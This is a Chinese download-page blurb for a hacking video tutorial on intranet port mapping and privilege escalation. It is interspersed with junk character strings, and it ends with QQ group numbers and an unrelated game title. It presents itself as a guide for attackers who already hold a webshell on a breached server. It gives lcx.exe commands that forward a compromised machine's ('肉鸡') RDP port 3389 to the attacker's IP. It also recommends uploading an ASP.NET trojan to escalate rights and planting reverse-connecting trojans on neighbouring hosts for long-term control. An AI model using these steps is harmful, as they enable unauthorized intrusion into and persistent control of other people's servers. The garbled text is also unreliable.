软件简介:
( ~; ~( t# e4 }$ q9 N) }(注意:这是语音教程,请打开您的音响,并且使用1024*768的屏幕分辨率来观看本教程!)7 M2 i1 v; u- @
教程名称:端口映射内网提权教程- ~, }+ J% }6 Y. e4 i
主讲:低调小飞
- J! b4 Y9 v, P4 o/ v说明:
2 g) Q* a# W1 _
2 g( y5 b( |& A* Y5 j 当我们成功入侵一个网站并拿到WEBSHELL,开放了对方的3389或是已经得到了对方SQL server 的SA用户密码时却发现该服务器处在一个内网
4 T$ O, @9 |6 z+ r1 Q( D中环境,如:192.168.1.107 这样我们直接利用工具是无法成功连接的。那么我们就可以通过LCX端口转发来连接外网,再通过连接本机IP来连" P, u* B4 o+ R
接对方服务器。
3 q3 b4 J7 ?! VLCX使用方法:' ^- b( h5 p$ r9 Z
首先在自己机子的cmd下运行
q4 h6 M* N2 ^$ H; wlcx.exe -listen 110 33891- q% j* n4 i6 w" O$ n0 p5 T- z
意思是监听110端口并转发到33891端口, S- M3 |& r! ~
然后在肉鸡上运行 lcx.exe -slave 你的IP 110 肉机IP 33895 i+ A" |1 C& E4 m8 F
意思是 把肉机的3389端口 转发到 自己的IP 110端口上
, \+ w* q Q* d3 A4 W* ^
7 z! E5 L- `, C# _5 r问题分析:如果在入侵时ASP的控制权限过小,我们可以上传ASP.NET木马来扩大权限。再来做端口映射!: V. K: f. V/ @6 Z9 H' ]
+ E: o7 I" R- h2 W2 q- l3 E' E思路扩展:通过其他的手段,控制同网段其他机器,并对计算机安装反弹木马,这样来达到长期控制对方服务器!
- h1 g: P/ p9 ?" q============================= j/ z p' r0 v* p* E' h+ Y, v* e2 b
41259640低調小飛技術交流群㈡
3 o7 ]1 A) _8 K% s7 X" M41209575低調小飛技術交流群㈢
' ~! C0 d( d5 Z( G H1 F41209451低調小飛技術交流群㈣
6 F# ^/ I+ s' I3 b+ T4 r22387823低調小飛技術交流群㈤
3 u0 V, ^5 { p. H6 ~ O9 x. R# @16599303低調小飛技術交流群㈥
( \4 ~8 {+ e$ Z5 d( K0 ^) l16639680低調小飛技術交流群㈦
% J3 I6 N3 \3 Z1 C6 _& C" r) G4 o41209297低調小飛技術交流群㈧
9 o+ W4 } {) [6 t+ @6 Y6 M: M下载地址:
|
最新整理Linux手工服务端_末世策略塔防手游
